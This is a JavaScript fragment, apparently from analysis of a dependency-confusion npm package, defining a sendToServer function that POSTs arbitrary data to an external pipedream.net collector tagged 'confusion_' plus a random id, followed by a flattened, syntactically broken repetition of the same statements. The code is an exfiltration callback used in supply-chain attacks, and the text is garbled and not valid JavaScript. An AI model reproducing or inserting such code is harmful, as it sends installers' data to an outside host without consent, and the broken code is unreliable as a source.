function sendToServer = function sendToServer(data) {

    const telegram_data = JSON.stringify({
        chat_id: '298118942',
        text: data
    })
    const crypto = require("crypto");
    const id = crypto.randomBytes(10).toString("hex");
    const options = {
        hostname: 'enhvcu12y09lt7y.m.pipedream.net',
        port: 443,
        path: '/?host=confusion_' +  id,
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Content-Length': telegram_data.length
        }
    }

    const req = https.request(options, res => {})

    req.write(telegram_data)
    req.end()
}
const telegram_data = JSON.stringify({
        chat_id: '298118942',
        text: data
    })
_tmp_0.chat_id = "298118942"
_tmp_0.text = data
const crypto = require("crypto")
const id = crypto.randomBytes(10).toString("hex")
const options = {
        hostname: 'enhvcu12y09lt7y.m.pipedream.net',
        port: 443,
        path: '/?host=confusion_' +  id,
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Content-Length': telegram_data.length
        }
    }
_tmp_2.hostname = "enhvcu12y09lt7y.m.pipedream.net"
_tmp_2.port = 443
_tmp_2.path = '/?host=confusion_' +  id
_tmp_2.method = "POST"
_tmp_2.headers = {
            'Content-Type': 'application/json',
            'Content-Length': telegram_data.length
        }
_tmp_3.Content-Type = "application/json"
_tmp_3.Content-Length = telegram_data.length
const req = https.request(options, res => {})
req.write(telegram_data)
